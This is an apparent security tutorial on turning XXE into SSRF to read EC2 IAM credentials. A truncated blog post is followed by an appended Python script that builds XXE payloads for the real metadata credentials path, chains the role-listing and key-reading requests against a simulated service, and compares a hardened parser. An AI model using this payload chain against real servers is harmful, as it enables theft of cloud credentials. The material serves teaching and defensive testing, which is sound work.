Exploiting XXE for SSRF

Gupta Bless
4 min readOct 10, 2020

Retrieving the IAM credentials of an EC2 instance using XXE and SSRF

Server-Side Request Forgery (SSRF): SSRF is an attack in which an attacker forces a vulnerable server to issue requests of the attacker's choosing to third-party servers or to internal resources that are reachable only from the server itself.

For more on SSRF and its exploitation check my previous blog:

https://medium.com/bugbountywriteup/exploiting-ssrf-for-admin-access-31c30457cc44

XML External Entity (XXE): An XML External Entity attack targets an application that parses XML input with a parser that resolves external entities declared in the DTD. It often allows an attacker to read files on the application server's file system and to interact with any backend or external systems that the application itself can reach, and in some configurations it can be escalated to remote code execution.

For more on XXE check my previous blog:

https://medium.com/@gupta.bless/exploitation-xml-external-entity-xxe-1f5f3e7bc5c4

How to escalate XXE vulnerability to perform SSRF execution?

Exploiting this lets an attacker reach local infrastructure or the internal network from the vulnerable server, so requests originate from a trusted host and bypass the WAF and network controls that would block the attacker directly; the result is often sensitive information disclosure.

To escalate XXE into SSRF, the external entity must be declared with the URL we want the server to request as its SYSTEM identifier, and then use the value of the…
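The following Python script is an added example, not code from the original post. It models the full chain the post describes: the attacker declares an external entity pointing at the EC2 instance metadata service (169.254.169.254), the server-side parser resolves it, and the entity's value is reflected back in the parsed content. The metadata service is replaced by a constructed in-memory stand-in (the role name and credential values are made up), so the script runs offline; expat's ExternalEntityRefHandler hook is used to show exactly where a resolving parser performs the SSRF request, and the hardened parser simply never installs that hook and refuses DOCTYPE declarations.

```python
import json
import xml.parsers.expat

# Real IMDSv1 path that lists the IAM role(s) attached to the instance profile.
ROLE_LIST_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Constructed stand-in for the instance metadata service (no network access).
# Role name and credential values are invented for the example.
FAKE_IMDS = {
    ROLE_LIST_URL: "example-instance-role\n",
    ROLE_LIST_URL + "example-instance-role": (
        '{"Code":"Success","AccessKeyId":"ASIAEXAMPLE",'
        '"SecretAccessKey":"EXAMPLESECRET","Token":"EXAMPLETOKEN"}'
    ),
}


def fake_imds_fetch(url):
    """Stand-in for the HTTP GET a resolving parser would issue."""
    return FAKE_IMDS[url]


def build_payload(url):
    """XXE payload: an external general entity whose SYSTEM id is the target URL,
    referenced inside the element so its content is reflected in the parse result."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        '  <!ENTITY xxe SYSTEM "%s">\n'
        "]>\n"
        "<data>&xxe;</data>" % url
    )


class DoctypeRejected(Exception):
    pass


def parse_xml(xml_text, fetch=None, allow_doctype=True):
    """Parse XML and return (character data, list of URLs the parser requested).

    fetch=<callable>  : vulnerable configuration, external entities are resolved
                        by fetching their SYSTEM id (this is the SSRF).
    fetch=None        : hardened, external entity references are never resolved.
    allow_doctype=False: hardened further, any DTD is rejected outright.
    """
    parser = xml.parsers.expat.ParserCreate()
    chunks, requested = [], []

    if not allow_doctype:
        def start_doctype(name, system_id, public_id, has_internal_subset):
            raise DoctypeRejected("DOCTYPE declarations are not permitted")
        parser.StartDoctypeDeclHandler = start_doctype

    parser.CharacterDataHandler = chunks.append

    if fetch is not None:
        def external_entity_ref(context, base, system_id, public_id):
            # A resolving parser turns the entity's SYSTEM id into a request
            # made from the server: this is the XXE-to-SSRF step.
            requested.append(system_id)
            sub = parser.ExternalEntityParserCreate(context)
            sub.Parse(fetch(system_id), True)  # fetched body becomes entity text
            return 1
        parser.ExternalEntityRefHandler = external_entity_ref

    parser.Parse(xml_text, True)
    return "".join(chunks), requested


def steal_credentials(fetch):
    """Two-request chain against a vulnerable parser: list roles, then read keys."""
    roles, _ = parse_xml(build_payload(ROLE_LIST_URL), fetch=fetch)
    role = roles.strip().splitlines()[0]
    body, _ = parse_xml(build_payload(ROLE_LIST_URL + role), fetch=fetch)
    return json.loads(body)


if __name__ == "__main__":
    creds = steal_credentials(fake_imds_fetch)
    print("vulnerable parser leaked AccessKeyId:", creds["AccessKeyId"])
    text, urls = parse_xml(build_payload(ROLE_LIST_URL))
    print("hardened parser reflected:", repr(text), "requests made:", urls)
```

The same two-step shape applies against a real target: the first payload returns the role name, the second appends it to the path to obtain the temporary AccessKeyId, SecretAccessKey and Token. Two caveats a tester should expect: the response only leaks if the parsed content is reflected or otherwise observable, and an instance that enforces IMDSv2 requires a PUT request to obtain a session token first, which an entity-driven GET cannot perform.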
